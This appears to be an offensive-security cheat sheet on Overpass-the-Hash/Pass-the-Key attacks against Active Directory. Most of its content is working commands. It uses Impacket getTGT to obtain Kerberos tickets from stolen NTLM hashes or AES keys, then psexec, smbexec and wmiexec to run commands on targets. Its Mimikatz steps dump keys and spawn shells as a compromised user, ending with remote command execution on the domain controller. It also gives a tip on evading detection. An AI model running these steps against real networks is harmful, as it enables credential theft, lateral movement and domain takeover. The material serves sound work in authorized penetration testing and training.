Overpass the Hash/Pass the Key

Whereas that hash is used to authenticate in Pass the Hash attacks, in OverPass the Hash attacks, it is used to submit a signed request to the Kerberos Domain Controller (KDC) for a full Kerberos TGT (Ticket Granting Ticket) or service ticket on behalf of that compromised user. That ticket can provide access to a wide range of services and assets.

The idea of overpass-the-hash is for an attacker to use the NTLM hash of another user account to obtain a Kerberos ticket which can be used to access network resources. This can come in handy if you are only able to obtain the NTLM hash for an account.

Over Pass the Hash/Pass the Key (HackTricks)
Lateral Movement: Over Pass the Hash (Hacking Articles)
Pass the key (with good examples!)

Prerequisites

Remotely

Locally

Prerequisites

Requires access to the admin share “Admin$”, which requires local administrative rights on
the target machine.

Valid NTLM hash or AES key of a user on a compromised computer or DC
Administrative privileges on the compromised machine

Remotely (Kali) – Using Impacket

Use a password, hash or aesKey, it will request a TGT and save it as ccache.

Request Kerberos authorized ticket in the form of ccache file

Supports use of a password, NTLM hash or AES key.

IP=x.x.x.x # IP of DC
DOMAIN=example.com
USER=Administrator

impacket-getTGT -dc-ip $IP -hashes :<NTLM hash> ${DOMAIN}/${USER}

impacket-getTGT -dc-ip $IP ${DOMAIN}/${USER}:MYCOMPROMISEDPASSWORD

Inject the ticket to access the resource

export KRB5CCNAME=${USER}.ccache

impacket-psexec -dc-ip $IP -target-ip $IP -no-pass -k ${DOMAIN}/${USER}@<target machine name>.${DOMAIN}

impacket-smbexec -dc-ip $IP -target-ip $IP -no-pass -k ${DOMAIN}/${USER}@<target machine name>.${DOMAIN}

impacket-wmiexec -dc-ip $IP -target-ip $IP -no-pass -k ${DOMAIN}/${USER}@<target machine name>.${DOMAIN}

Locally (victim) – Using Mimikatz

See Mimikatz.

Fetch all keys NTLM (RC4), AES128, AES256 key

privilege::debug
sekurlsa::ekeys

Open a Powershell window as the compromised user

sekurlsa::pth /user:john /domain:example.com
/ntlm:<NTLM HASH> /run:PowerShell.exe

sekurlsa::pth /user:Administrator /domain:ignite.local /aes128:<AES 128 key>

sekurlsa::pth /user:Administrator /domain:ignite.local /aes256:<AES 256 key>

If you will use NTLM (RC4), ASE128, ASE256 simultaneously for injecting into Kerberos ticket, this step is more secure and undetectable in the network (according to Hacking Articles).

sekurlsa::pth /user:Administrator /domain:igntie.local /ntlm:<NTLM HASH> /aes128:<AES 128 KEY> /aes256:<AES 256 key>

Generate a TGT by connecting to a network share (SMB) on the DC and list tickets

net use \\dc01
klist

dir \\dc01\c$
klist

We can now use Kerberos authentication instead of NTLM. We can use any tools that rely on Kerberos like PsExec (see Sysinternals).

Run commands remotely on the DC

psexec.exe \\dc01 cmd.exe
ipconfig
whoami